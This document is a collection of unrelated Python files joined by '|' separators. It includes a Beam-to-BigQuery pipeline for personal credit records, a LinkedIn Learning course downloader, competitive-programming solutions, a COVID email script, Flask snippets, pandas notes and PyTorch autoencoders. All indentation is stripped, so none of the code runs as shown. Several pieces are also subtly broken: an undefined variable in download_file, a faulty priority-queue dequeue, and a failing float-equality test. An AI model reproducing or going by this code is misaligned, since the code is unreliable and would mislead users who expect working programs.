'UPZ:STRING, '
'LOCALIDAD:STRING, '
'CIUDAD_RESIDENCIA:STRING, '
'DEPTO_RESIDENCIA:STRING, '
'GRUPO_DEPTO:STRING, '
'CELULAR:STRING, '
'EMAIL:STRING, '
'PERMITE_CONTACTO:STRING, '
'TIENE_CELULAR:STRING, '
'TIENE_CORREO:STRING, '
'MADRE:STRING, '
'PADRE:STRING, '
'CONYUGE:STRING, '
'HIJO1:STRING, '
'HIJO2:STRING, '
'HIJO3:STRING, '
'HIJO4:STRING, '
'HIJO5:STRING, '
'D1:STRING, '
'D2:STRING, '
'D3:STRING, '
'D4:STRING, '
'D5:STRING, '
'D6:STRING, '
'D7:STRING, '
'D8:STRING, '
'D9:STRING, '
'D10:STRING '
)
# ?
class formatearData(beam.DoFn):
def __init__(self, mifecha):
super(formatearData, self).__init__()
self.mifecha = mifecha
def process(self, element):
# print(element)
arrayCSV = element.split(';')
tupla= {'idkey' : str(uuid.uuid4()),
'fecha' : self.mifecha,
'ID' : arrayCSV[0],
'USER_ID' : arrayCSV[1],
'LINK' : arrayCSV[2],
'FECHA_INGRESO_REGISTRO' : arrayCSV[3],
'HORA_INGRESO_REGISTRO' : arrayCSV[4],
'VACIO1' : arrayCSV[5],
'VACIO2' : arrayCSV[6],
'CEDULA_AGENTE' : arrayCSV[7],
'CORREO_AGENTE' : arrayCSV[8],
'PAIS' : arrayCSV[9],
'CIUDAD' : arrayCSV[10],
'NOMBRE_AGENTE' : arrayCSV[11],
'FECHA_CARGUE_B' : arrayCSV[12],
'FECHA_GESTION' : arrayCSV[13],
'HORA_GESTION' : arrayCSV[14],
'TIPIFICACION1' : arrayCSV[15],
'FECHA_SOLUCION' : arrayCSV[16],
'HORA_SOLUCION' : arrayCSV[17],
'OBSERVACIONES' : arrayCSV[18],
'ALERT1' : arrayCSV[19],
'TIPIFICACION2' : arrayCSV[20],
'TIPIFICACION3' : arrayCSV[21],
'VACIO6' : arrayCSV[22],
'ESTADO_REGISTRO' : arrayCSV[23],
'TIPO_GESTION_BASE' : arrayCSV[24],
'ROL' : arrayCSV[25],
'FECHA_GESTION2' : arrayCSV[26],
'TIPO_DE_CREDITO' : arrayCSV[27],
'PRODUCTO_DE_INTERES' : arrayCSV[28],
'VACIO3' : arrayCSV[29],
'VACIO4' : arrayCSV[30],
'MES_CARGUE' : arrayCSV[31],
'MES_GESTION' : arrayCSV[32],
'DATOS_1' : arrayCSV[33],
'DATOS_2' : arrayCSV[34],
'DATOS_3' : arrayCSV[35],
'DATOS_4' : arrayCSV[36],
'DATOS_5' : arrayCSV[37],
'ESTADO_PROCESO_VENTA' : arrayCSV[38],
'DATOS_7' : arrayCSV[39],
'DATOS_8' : arrayCSV[40],
'GESTION_CON_LLAMADA' : arrayCSV[41],
'VACIO7' : arrayCSV[42],
'VACIO8' : arrayCSV[43],
'PRIMER_NOMBRE' : arrayCSV[44],
'SEGUNDO_NOMBRE' : arrayCSV[45],
'PRIMER_APELLIDO' : arrayCSV[46],
'SEGUNDO_APELLIDO' : arrayCSV[47],
'FECHA_DE_NACIMIENTO' : arrayCSV[48],
'SALARIO' : arrayCSV[49],
'VALOR_SUBSIDIO' : arrayCSV[50],
'SUBSIDIOS_RECIBIDOS' : arrayCSV[51],
'PAC_A_CARGO' : arrayCSV[52],
'TIPO_DE_EMPLEADOR' : arrayCSV[53],
'TIPO_NACIONALIDAD' : arrayCSV[54],
'TIPO_IDENTIFICACION' : arrayCSV[55],
'NOMBRE_COMPLETO' : arrayCSV[56],
'SEXO' : arrayCSV[57],
'GRUO_ESTADO_CIVIL' : arrayCSV[58],
'DEPTO' : arrayCSV[59],
'CIUDAD2' : arrayCSV[60],
'PAIS2' : arrayCSV[61],
'TIPO_DE_AFILIADO' : arrayCSV[62],
'GRUPO_DE_AFILIADO' : arrayCSV[63],
'CATEGORIA_DE_AFILIACION' : arrayCSV[64],
'RECIBE_SUBSIDIO' : arrayCSV[65],
'RECIBE_SUBSIDIO2' : arrayCSV[66],
'EDAD' : arrayCSV[67],
'ENTRE_0_Y_05_ANOS' : arrayCSV[68],
'ENTRE_06_Y_10_ANOS' : arrayCSV[69],
'ENTRE_11_Y_18_ANOS' : arrayCSV[70],
'ENTRE_19_Y_23_ANOS' : arrayCSV[71],
'ENTRE_24_Y_25_ANOS' : arrayCSV[72],
'MAYORES_DE_25_ANOS' : arrayCSV[73],
'TOTAL_HIJOS' : arrayCSV[74],
'TIENE_HIJOS' : arrayCSV[75],
'NIT' : arrayCSV[76],
'ASESOR_ESPECIALIZADO' : arrayCSV[77],
'SEGMENTO' : arrayCSV[78],
'CANAL_ABORDAJE_TELEFONICO' : arrayCSV[79],
'CHECK_ABORDAJE' : arrayCSV[80],
'ANTIGUEDAD' : arrayCSV[81],
'MONTO_SOLICITADO' : arrayCSV[82],
'PLAZO' : arrayCSV[83],
'TASA' : arrayCSV[84],
'LINEA' : arrayCSV[85],
'SOLICITUD_ULTIMOS_3_MESES' : arrayCSV[86],
'SOLICITUD_ULTIMOS_6_MESES' : arrayCSV[87],
'SALDOVENCIDO' : arrayCSV[88],
'SALDOVIGENTE' : arrayCSV[89],
'DIASATRASO' : arrayCSV[90],
'MONTO_DESEMBOLSADO' : arrayCSV[91],
'PLAZO_1' : arrayCSV[92],
'TASA_1' : arrayCSV[93],
'CUOTAS_PENDIENTES' : arrayCSV[94],
'SALDO_PENDIENTE' : arrayCSV[95],
'CREDITO_ACTIVO' : arrayCSV[96],
'LINEA_1' : arrayCSV[97],
'DESEMBOLSO_ULTIMOS_3_MESES' : arrayCSV[98],
'DESEMBOLSO_ULTIMOS_6_MESES' : arrayCSV[99],
'NOMBRE_EMPRESA' : arrayCSV[100],
'ESTADO' : arrayCSV[101],
'NOMTIPO' : arrayCSV[102],
'GRUPO_ACTIVIDAD_ECONOMICA' : arrayCSV[103],
'TIPO_DE_APORTANTE' : arrayCSV[104],
'SECTOR' : arrayCSV[105],
'TAMANO' : arrayCSV[106],
'DIRECCION_NORMALIZADA' : arrayCSV[107],
'BARRIO' : arrayCSV[108],
'UPZ' : arrayCSV[109],
'LOCALIDAD' : arrayCSV[110],
'CIUDAD_RESIDENCIA' : arrayCSV[111],
'DEPTO_RESIDENCIA' : arrayCSV[112],
'GRUPO_DEPTO' : arrayCSV[113],
'CELULAR' : arrayCSV[114],
'EMAIL' : arrayCSV[115],
'PERMITE_CONTACTO' : arrayCSV[116],
'TIENE_CELULAR' : arrayCSV[117],
'TIENE_CORREO' : arrayCSV[118],
'MADRE' : arrayCSV[119],
'PADRE' : arrayCSV[120],
'CONYUGE' : arrayCSV[121],
'HIJO1' : arrayCSV[122],
'HIJO2' : arrayCSV[123],
'HIJO3' : arrayCSV[124],
'HIJO4' : arrayCSV[125],
'HIJO5' : arrayCSV[126],
'D1' : arrayCSV[127],
'D2' : arrayCSV[128],
'D3' : arrayCSV[129],
'D4' : arrayCSV[130],
'D5' : arrayCSV[131],
'D6' : arrayCSV[132],
'D7' : arrayCSV[133],
'D8' : arrayCSV[134],
'D9' : arrayCSV[135],
'D10' : arrayCSV[136]
}
return [tupla]
def run(archivo, mifecha):
gcs_path = "gs://ct-avon" #Definicion de la raiz del bucket
gcs_project = "contento-bi"
mi_runer = ("DirectRunner", "DataflowRunner")[socket.gethostname()=="contentobi"]
pipeline = beam.Pipeline(runner=mi_runer, argv=[
"--project", gcs_project,
"--staging_location", ("%s/dataflow_files/staging_location" % gcs_path),
"--temp_location", ("%s/dataflow_files/temp" % gcs_path),
"--output", ("%s/dataflow_files/output" % gcs_path),
"--setup_file", "./setup.py",
"--max_num_workers", "5",
"--subnetwork", "https://www.googleapis.com/compute/v1/projects/contento-bi/regions/us-central1/subnetworks/contento-subnet1"
# "--num_workers", "30",
# "--autoscaling_algorithm", "NONE"
])
# lines = pipeline | 'Lectura de Archivo' >> ReadFromText("gs://ct-bancolombia/info-segumiento/BANCOLOMBIA_INF_SEG_20181206 1100.csv", skip_header_lines=1)
#lines = pipeline | 'Lectura de Archivo' >> ReadFromText("gs://ct-bancolombia/info-segumiento/BANCOLOMBIA_INF_SEG_20181129 0800.csv", skip_header_lines=1)
lines = pipeline | 'Lectura de Archivo' >> ReadFromText(archivo, skip_header_lines=1)
transformed = (lines | 'Formatear Data' >> beam.ParDo(formatearData(mifecha)))
# lines | 'Escribir en Archivo' >> WriteToText("archivos/Info_carga_banco_prej_small", file_name_suffix='.csv',shard_name_template='')
# transformed | 'Escribir en Archivo' >> WriteToText("archivos/Info_carga_banco_seg", file_name_suffix='.csv',shard_name_template='')
#transformed | 'Escribir en Archivo' >> WriteToText("gs://ct-bancolombia/info-segumiento/info_carga_banco_seg",file_name_suffix='.csv',shard_name_template='')
transformed | 'Escritura a BigQuery seguimiento_credito' >> beam.io.WriteToBigQuery(
gcs_project + ":cafam.seguimiento_credito",
schema=TABLE_SCHEMA,
create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,
write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND
)
# transformed | 'Borrar Archivo' >> FileSystems.delete('gs://ct-avon/prejuridico/AVON_INF_PREJ_20181111.TXT')
# 'Eliminar' >> FileSystems.delete (["archivos/Info_carga_avon.1.txt"])
jobObject = pipeline.run()
# jobID = jobObject.job_id()
return ("Corrio Full HD")
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
from app import app
from app import db
migrate=Migrate(app,db)
manager=Manager(app)
manager.add_command('db',MigrateCommand)
if __name__ == '__main__':
manager.run()
|
#https://codeforces.com/problemset/problem/4/A
n = int(input())
p = 0
q = n
for i in range(1, n):
p = i
q = n - i
#print(p, q)
if q%2==0 and p%2==0:
print('YES')
break
else:
pass
if q%2==0 and p%2==0:
pass
else:
print('NO')
|
from .people import PeopleService
def create_people_service(people_repository):
return PeopleService(people_repository)
|
# The problem is here:
# https://www.hackerrank.com/challenges/equal
def count(a):
ans = a/5
a = a%5
ans += a/2
a = a%2
ans += a
return ans
q = int(raw_input())
for qs in range(q):
n = int(raw_input())
a = map(int, raw_input().strip().split())
minimum = min(a)
for i in range(len(a)):
a[i] -= minimum
ans = [0 for i in range(3)]
for p in range(3):
for i in range(len(a)):
ans[p] += count(a[i])
a[i] += 1
print min(ans)
|
import logging , re, os
from itertools import chain, filterfalse, starmap
from collections import namedtuple
from tqdm import tqdm
BASE_DOWNLOAD_PATH = os.path.join(os.path.dirname(__file__), "downloads")
HEADERS = {
'Content-Type': 'application/json',
'user-agent': 'Mozilla/5.0'
}
session = None
FILE_TYPE_VIDEO = ".mp4"
FILE_TYPE_SUBTITLE = ".srt"
Course = namedtuple("Course", ["name", "slug", "description", "unlocked", "chapters","author"])
Chapter = namedtuple("Chapter", ["name", "videos", "index"])
Video = namedtuple("Video", ["name", "slug", "index", "filename"])
def sub_format_time(ms):
seconds, milliseconds = divmod(ms, 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
return f'{hours:02}:{minutes:02}:{seconds:02},{milliseconds:02}'
def clean_dir_name(dir_name):
# Remove starting digit and dot (e.g '1. A' -> 'A')
# Remove bad characters (e.g 'A: B' -> 'A B')
no_digit = re.sub(r'^\d+\.', "", dir_name)
no_bad_chars = re.sub(r'[\\:<>"/|?*]', "", no_digit)
return no_bad_chars.strip()
def chapter_dir(course: Course, chapter: Chapter):
folder_name = f"{str(chapter.index).zfill(2)} - {clean_dir_name(chapter.name)}"
if folder_name == '01 - ':folder_name = '01 - Welcome'
chapter_path = os.path.join(BASE_DOWNLOAD_PATH, course.author + " - " + clean_dir_name(course.name), folder_name)
return chapter_path
def build_course(course_element: dict):
author = " ".join(course_element['authors'][0]['slug'].split('-')).title()
chapters = [
Chapter(name=course['title'],
videos=[
Video(name=video['title'],
slug=video['slug'],
index=idx,
filename=f"{str(idx).zfill(2)} - {clean_dir_name(video['title'])}{FILE_TYPE_VIDEO}"
)
for idx, video in enumerate(course['videos'], start=1)
],index=idx)
for idx, course in enumerate(course_element['chapters'], start=1)
]
course = Course(name=course_element['title'],
slug=course_element['slug'],
description=course_element['description'],
unlocked=course_element['fullCourseUnlocked'],
chapters=chapters,
author=author)
logging.info(f'[*] Fetching course {course_element["title"]} Exercise Files')
if course_element.get('exerciseFiles',''):
chapter_path = os.path.join(BASE_DOWNLOAD_PATH, author + " - " + clean_dir_name(course.name), 'Exercise Files')
if not os.path.exists(chapter_path) : os.makedirs(chapter_path)
for exercise in course_element['exerciseFiles']:
file_name = exercise['name']
file_link = exercise['url']
exercise_path = os.path.join(chapter_path,file_name)
exercise_exists = os.path.exists(exercise_path)
logging.info(f'[~] writing course {course_element["title"]} Exercise Files')
if exercise_exists :
logging.info(f'[~] Exercise File {file_name} already Exists')
continue
download_file(file_link,exercise_path)
logging.info(f'[*] Finished writing course {course_element["title"]} Exercise Files')
return course
def fetch_courses(sess,COURSES):
global session
session = sess
for course in COURSES:
if not course:continue
if 'learning/' in course :
splitted = course.split('learning/')[1]
course = splitted.split('/')[0] if '/' in splitted else splitted
fetch_course(course)
def fetch_course(course_slug):
url = f"https://www.linkedin.com/learning-api/detailedCourses??fields=fullCourseUnlocked,releasedOn,exerciseFileUrls,exerciseFiles&" \
f"addParagraphsToTranscript=true&courseSlug={course_slug}&q=slugs"
HEADERS['Csrf-Token'] = session.cookies._cookies['.www.linkedin.com']['/']['JSESSIONID'].value.replace('"','')
resp = session.get(url, headers=HEADERS)
if resp.status_code == 429 :
logging.info(f'[!] Faild due to: {resp.reason}')
return
data = resp.json()
# data['elements'][0]['exerciseFiles']
course = build_course(data['elements'][0])
logging.info(f'[*] Fetching course {course.name}')
fetch_chapters(course)
logging.info(f'[*] Finished fetching course "{course.name}"')
def fetch_chapters(course: Course):
chapters_dirs = [chapter_dir(course, chapter) for chapter in course.chapters]
# Creating all missing directories
missing_directories = filterfalse(os.path.exists, chapters_dirs)
for d in missing_directories:
os.makedirs(d)
for chapter in course.chapters:
fetch_chapter(course, chapter)
def fetch_chapter(course: Course, chapter: Chapter):
for video in chapter.videos :
fetch_video(course, chapter, video)
def fetch_video(course: Course, chapter: Chapter, video: Video):
subtitles_filename = os.path.splitext(video.filename)[0] + FILE_TYPE_SUBTITLE
video_file_path = os.path.join(chapter_dir(course, chapter), video.filename)
subtitle_file_path = os.path.join(chapter_dir(course, chapter), subtitles_filename)
video_exists = os.path.exists(video_file_path)
subtitle_exists = os.path.exists(subtitle_file_path)
if video_exists and subtitle_exists:
return
logging.info(f"[~] Fetching Chapter no. {chapter.index} Video no. {video.index}")
video_url = f'https://www.linkedin.com/learning-api/detailedCourses?addParagraphsToTranscript=false&courseSlug={course.slug}&q=slugs&resolution=_720&videoSlug={video.slug}'
data = None
tries = 3
for _ in range(tries):
try:
resp = session.get(video_url, headers=HEADERS)
data = resp.json()
resp.raise_for_status()
break
except :
logging.error("[!] This Video is Locked, make sure you have access to linkedin learning via premium account")
try:
video_url = data['elements'][0]['selectedVideo']['url']['progressiveUrl']
except :
logging.error("[!] This Video is Locked, make sure you have access to linkedin learning via premium account")
return
try:
subtitles = data['elements'][0]['selectedVideo']['transcript']
except :
logging.error("[!] Extracting Video subtitles Error")
subtitles = None
duration_in_ms = int(data['elements'][0]['selectedVideo']['durationInSeconds']) * 1000
if not video_exists:
logging.info(f"[~] Writing {video.filename}")
download_file(video_url, video_file_path)
if subtitles is not None:
logging.info(f"[~] Writing {subtitles_filename}")
subtitle_lines = subtitles['lines']
write_subtitles(subtitle_lines, subtitle_file_path, duration_in_ms)
logging.info(f"[~] Done fetching Chapter no. {chapter.index} Video no. {video.index}")
def write_subtitles(subs, output_path, video_duration):
def subs_to_lines(idx, sub):
starts_at = sub['transcriptStartAt']
ends_at = subs[idx]['transcriptStartAt'] if idx < len(subs) else video_duration
caption = sub['caption']
return f"{idx}\n" \
f"{sub_format_time(starts_at)} --> {sub_format_time(ends_at)}\n" \
f"{caption}\n\n"
with open(output_path, 'wb') as f:
for line in starmap(subs_to_lines, enumerate(subs, start=1)):
f.write(line.encode('utf8'))
def download_file(url, output_path):
if url:
try:
r = session.get(url, stream=True)
file_name = os.path.basename(output_path)
file_size = int(r.headers.get('content-length', 0))
initial_pos = 0
r.raise_for_status()
with open(output_path, 'wb') as f:
with tqdm(total=file_size, unit='B',
unit_scale=True, unit_divisor=1024,
desc=file_name, initial=initial_pos,
ascii=True, miniters=1) as pbar:
for chunk in r.iter_content(32 * 1024):
f.write(chunk)
pbar.update(len(chunk))
except Exception as e:
logging.info(url)
logging.error(f"[!] Error while downloading: '{e}'")
if os.path.exists(output):
os.remove(output)
else:
logging.info(f'[!!] Error while Downloaind ==> Not a valid URL')
|
# NaivePriorityQueue (aka 'ShittyQueue'): A simple but inefficient priority queue.
# Your implementation should pass the tests in test_naive_priority_queue.py.
# Andras Mihaly
class NaivePriorityQueue:
def __init__(self):
self.data = []
def enqueue(self, value):
self.data.append(value)
def dequeue(self):
high = 0
for term in self.data:
if term.priority.__gt__(high):
high = term.priority
return self.data.pop(self.data.index(term))
|
def adder(lhs, rhs):
return lhs + rhs
def suber(lhs, rhs):
return lhs - rhs
def test_adder_simple_add():
assert adder(9, 10) == 19
def test_adder_floats():
assert adder(1.1, 2.3) == 3.4
def test_suber_simple():
assert suber(10, 7) == 3
|
import urllib.request
from flask import Flask, request,jsonify
import json
import matplotlib.pyplot as plt
import numpy
import os
import smtplib
global con
global rec
global act
global dec
global ip2
global ip1
global total
global red_zone
EMAIL_ID = os.environ.get('DB_USER')
EMAIL_PASS = os.environ.get('DB_PASS')
RECEIVER = input("Enter your E-mail ID:\n")
def getResponse(url):
openUrl = urllib.request.urlopen(url)
if(openUrl.getcode()==200):
data = openUrl.read()
jsonData = json.loads(data)
else:
print("Error receiving data", openUrl.getcode())
return jsonData
def main():
total = 0
y_ax = []
x_ax = []
y = {}
urlData = "https://api.covid19india.org/v2/state_district_wise.json"
jsonData = getResponse(urlData)
ip1 = input("Enter your state: ")
ip2 = input("Enter your district: ")
for i in jsonData:
x = i["state"]
if x == ip1 :
y[x] = i["districtData"]
for t in y[x]:
k = t["district"]
if k == ip2 :
con = t["confirmed"]
rec = t["recovered"]
act = t["active"]
dec = t["deceased"]
print("Confirmed Patients : ",con)
print("Recovered Patients : ",rec)
print("Active Patients : ",act)
print("Deceased Patients : ",dec)
for i in jsonData:
x = i["state"]
y[x] = i["districtData"]
for t in y[x]:
con = t["confirmed"]
total = total + con
with smtplib.SMTP_SSL('smtp.gmail.com',465) as smtp:
smtp.login(EMAIL_ID,EMAIL_PASS)
subject = 'COVID-19 STATS UPDATE'
data_string1 = f'Dear user!\n' \
f'We hope you\'re staying safe and staying home.\n' \
f'Currently, more than 3 million people are affected worldwide and {total} people are affected in India.\n' \
f'Here are the stats for {ip2},{ip1} -\n' \
f'Confirmed Patients : {con}\n' \
f'Recovered Patients : {rec}\n' \
f'Active Patients : {act}\n' \
f'Deceased Patients : {dec}\n' \
f'Your area is in Red Zone!' \
data_string = f'Dear user!\n' \
f'We hope you\'re staying safe and staying home.\n' \
f' Currently, more than 3 million people are affected worldwide and {total} people are affected in India.\n' \
f'Here are the stats for {ip2},{ip1} -\n' \
f'Confirmed Patients : {con}\n' \
f'Recovered Patients : {rec}\n' \
f'Active Patients : {act}\n' \
f'Deceased Patients : {dec}\n' \
f'Your area is not in Red Zone!' \
if act >= 15:
body = data_string1
else:
body = data_string
msg = f'Subject: {subject}\n\n{body}'
smtp.sendmail(EMAIL_ID, RECEIVER, msg)
if __name__ == '__main__':
main()
|
from flask_restful import Resource
from flask import request
from auth.manager import update_role
from decorators import admin_required
from exception import MyException
class RoleUpdate(Resource):
@classmethod
@admin_required
def patch(cls):
data = request.get_json()
if not data:
raise MyException('fields cannot be empty', status_code=400)
return update_role(data['username'], data['role'])
|
# Filename : instead_enter.py
# Author by : Lily
# 用quit来代替回车结束程序
def file_write(filename):
f = open(filename, 'w', encoding='utf-8')
def file_write(file_name):
f = open(file_name, 'w', encoding='utf-8')
print('请输入内容【单独输入\'quit\'保存退出】')
while True:
file_content = input()
if file_content != 'quit':
f.write('%s\n' % file_content)
else:
break
f.close()
file_n = input('请输入文件名:')
file_write(file_n)
my_file_name = input('请输入文件名:')
file_write(my_file_name)
|
# Copyright 2022 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
class TermNotStarted(Exception):
pass
|
import unittest
from unittest import TestCase
from plot import *
from date import *
from test_grades import *
import pandas as pd
# author: Kaiwen Liu
# this is a test for assignment 10
class test(unittest.TestCase):
def setUp(self):
pass
# test if the test_grades function returns the correct value
def test_grades_test(self):
self.assertEqual(test_grades(['C','C']), 0)
self.assertEqual(test_grades(['A','C']), -1)
self.assertEqual(test_grades(['C','A']), 1)
def test_plot_columns(self): # test if there are 3 columns in the merged
self.assertTrue(len(self.df_date_and_grade.columns) == 4)
def test_plot_correct_columns(self): # test if the dataframe has the correct columns
self.assertEqual(self.df_date_and_grade.columns, ['Date','A','B','C'])
if __name__ == '__main__':
unittest.main()
|
from django.apps import AppConfig
class RoomConfig(AppConfig):
name = 'room'
verbose_name = '면접실 & 면접 시간표 관리'
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 16 11:32:28 2020
@author: adeela
"""
'''
https://pandas.pydata.org/pandas-docs/stable/getting_started/10min.html#min
'''
import numpy as np
import pandas as pd
s = pd.Series(['1', 1, np.nan, 1])
s
# gives 6 dates starting from 2020-01-01
dates = pd.date_range('2020-01-01', periods=6)
# returns list as ['A', 'B', 'C', 'D']
list('ABCD')
# returns a row matrix of size 6*4 with random entries
np.random.randn(6,4)
df = pd.DataFrame(np.random.randn(6,4),
index = dates,
columns=list('1234'))
## datframe from dictionary object
df2 = pd.DataFrame({
'A': 1,
'B': pd.Timestamp('20200101'),
'C': pd.Categorical(['yes', 'no', 'yes', 'no']),
'D': np.array([3] * 4),
'E': pd.Series(1, index=range(4))
})
df2.dtypes # types of columns in dataframe
df2.A # can access the whole column
# to see the index of the dataframe
df2.index
df.index
#25%, 50%, 75% are q1, q2, q3 respectively
df.describe()
#transpose of data frame
df.T
# What is axis doing in sort by index???
df.sort_index(axis=0, ascending= True)
df.sort_index(axis=1, ascending= True)
#sort by values of column labeled '2'
df.sort_values(by = '2')
# =============================================================================
# SELECTION
# =============================================================================
#selecting a single column gives you back a series
df['1']
# to get rows by slicing syntax
# return rows 0 and 1
df [0:2]
#returns row where index value matches
df['2020-01-01': '2020-01-03']
#df['2020-01-01'] doesn't work
#getting data by the index value
df.loc['2020-01-01']
#select all rows for column named '1'
df.loc[:, '1']
#select all rows for column 1 and 2
df.loc[:, ['1', '2']]
# get values of column '1' and '2' where index value is ''
df.loc['2020-01-01', ['1','2']]
# get value of column '1' where index value is ''
df.loc['2020-01-01', ['1']]
# =============================================================================
# Selection by POSITION
# =============================================================================
# return the fourth row all columns
df.iloc[3]
#get values for 3 to 5th row and 1st column
df.iloc[2:5, 1]
#get values for 3 to 5th row and 2nd and 3rd column
df.iloc[2:5, 1:3]
#return 4th row all columns
df.iloc[3, :]
# value at row i and colum j
df.iloc[1,1]
# =============================================================================
# Bolean Indexing
# =============================================================================
#data where values of column '1' > 0
df[df['1']> 0 ]
#Adding a column
df['5'] = ['a', 'b', 'c', 'd', 'e', 'f']
# check if column has a certain value OR
# extract the row where column E has value a
df[df['5'].isin(['a'])]
## update value in data where column '5' has values a b and c
## Problem : it updated all values of column
# HOW TO JUST UPDATE THE VALUE OF COLUMN ???
df[df['5'].isin(list('abc'))] = 'g'
# =============================================================================
# APPLY function
# =============================================================================
## sum all elements of column '1'
df['1'].apply(np.sum)
## sum of all elements in the data
# if it is string , it returns a concatenated result
df.apply(np.sum)
## sum along the column meaning sum of each column
df.apply(np.sum, axis=0)
df.iloc[:, :4] # this selets all rows and columns till 4th index
#axis = 1 --> row
df.iloc[:, :4].apply(np.sum, axis=1)
# axis =0 --> column
df.iloc[:, :4].apply(np.sum, axis=0)
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class AutoEncoder(nn.Module):
def __init__(self):
super(AutoEncoder, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(3, 8, 5, stride=2, padding=2),
nn.PReLU(),
nn.Conv2d(8, 8, 5, stride=2, padding=2),
nn.PReLU(),
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(8, 8, 6, stride=2, padding=2),
nn.PReLU(),
nn.ConvTranspose2d(8, 3, 6, stride=2, padding=2),
nn.Sigmoid(),
)
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
class Encoder(nn.Module):
def __init__(self):
super(Encoder, self).__init__()
self.conv1 = nn.Conv2d(3, 12, 4, stride=2, padding=1)
self.conv2 = nn.Conv2d(12, 24, 4, stride=2, padding=1)
self.conv3 = nn.Conv2d(24, 48, 4, stride=2, padding=1)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
return x
class Decoder(nn.Module):
def __init__(self):
super(Decoder, self).__init__()
self.deconv1 = nn.ConvTranspose2d(48, 24, 4, stride=2, padding=1)
self.deconv2 = nn.ConvTranspose2d(24, 12, 4, stride=2, padding=1)
self.deconv3 = nn.ConvTranspose2d(12, 3, 4, stride=2, padding=1)
def forward(self, x):
x = F.relu(self.deconv1(x))
x = F.relu(self.deconv2(x))
x = self.deconv3(x)
x = torch.sigmoid(x)
return x
class Classifier(nn.Module):
def __init__(self):
super(Classifier, self).__init__()
self.fc1 = nn.Linear(48 * 4 * 4, 512)
self.fc2 = nn.Linear(512, 128)
self.fc3 = nn.Linear(128, 10)
def forward(self, x):
x = x.view(-1, 48 * 4 * 4)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class CAE(nn.Module):
def __init__(self):
super(CAE, self).__init__()
self.encoder = Encoder()
self.decoder = Decoder()
self.classifier = Classifier()
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def classify(self, x):
x = self.encoder(x)
x = self.classifier(x)
return x
class Encoder2(nn.Module):
def __init__(self):
super(Encoder2, self).__init__()
self.conv1 = nn.Conv2d(3, 16, 3, stride=1, padding=1)
self.conv2 = nn.Conv2d(16, 8, 3, stride=1, padding=1)
self.conv3 = nn.Conv2d(8, 8, 3, stride=1, padding=1)
self.pool1 = nn.MaxPool2d(2, stride=2)
self.pool2 = nn.MaxPool2d(2, stride=2)
self.bn1 = nn.BatchNorm2d(16)
self.bn2 = nn.BatchNorm2d(8)
self.bn3 = nn.BatchNorm2d(8)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
# x = F.elu(x)
x = F.leaky_relu(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.bn2(x)
# x = F.elu(x)
x = F.leaky_relu(x)
x = self.pool2(x)
x = self.conv3(x)
x = self.bn3(x)
# x = F.elu(x)
x = F.leaky_relu(x)
return x
class Decoder2(nn.Module):
def __init__(self):
super(Decoder2, self).__init__()
self.deconv3 = nn.ConvTranspose2d(8, 8, 3, stride=1, padding=1)
self.deconv2 = nn.ConvTranspose2d(8, 16, 3, stride=1, padding=1)
self.deconv1 = nn.ConvTranspose2d(16, 3, 3, stride=1, padding=1)
# self.upsample2 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample2 = nn.Upsample(scale_factor=2)
# self.upsample1 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample1 = nn.Upsample(scale_factor=2)
self.bn3 = nn.BatchNorm2d(8)
self.bn2 = nn.BatchNorm2d(16)
def forward(self, x):
x = self.deconv3(x)
x = self.bn3(x)
# x = F.elu(x)
x = F.leaky_relu(x)
x = self.upsample2(x)
x = self.deconv2(x)
x = self.bn2(x)
# x = F.elu(x)
x = F.leaky_relu(x)
x = self.upsample1(x)
x = self.deconv1(x)
x = torch.sigmoid(x)
return x
class Classifier2(nn.Module):
def __init__(self):
super(Classifier2, self).__init__()
# self.fc1 = nn.Linear(512, 256)
# self.fc2 = nn.Linear(256, 128)
# self.fc3 = nn.Linear(128, 64)
# self.fc4 = nn.Linear(64, 10)
self.fc1 = nn.Linear(512, 128)
self.fc2 = nn.Linear(128, 64)
self.fc3 = nn.Linear(64, 10)
self.dp1 = nn.Dropout(p=0.2)
self.dp2 = nn.Dropout(p=0.2)
self.weights_init()
def forward(self, x):
x = x.view(-1, 512)
x = self.fc1(x)
x = F.elu(x)
x = self.dp1(x)
x = self.fc2(x)
x = F.elu(x)
x = self.dp2(x)
x = self.fc3(x)
# x = F.elu(x)
# x = self.fc4(x)
return x
def weights_init(self):
nn.init.xavier_normal_(self.fc1.weight)
nn.init.xavier_normal_(self.fc2.weight)
nn.init.xavier_normal_(self.fc3.weight)
# nn.init.xavier_normal_(self.fc4.weight)
class CAE2(nn.Module):
def __init__(self):
super(CAE2, self).__init__()
self.encoder = Encoder2()
self.decoder = Decoder2()
self.classifier = Classifier2()
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def classify(self, x):
x = self.encoder(x)
x = self.classifier(x)
return x
def save_model(self, path='model_weights'):
torch.save(self.encoder.state_dict(), f'{path}/Encoder')
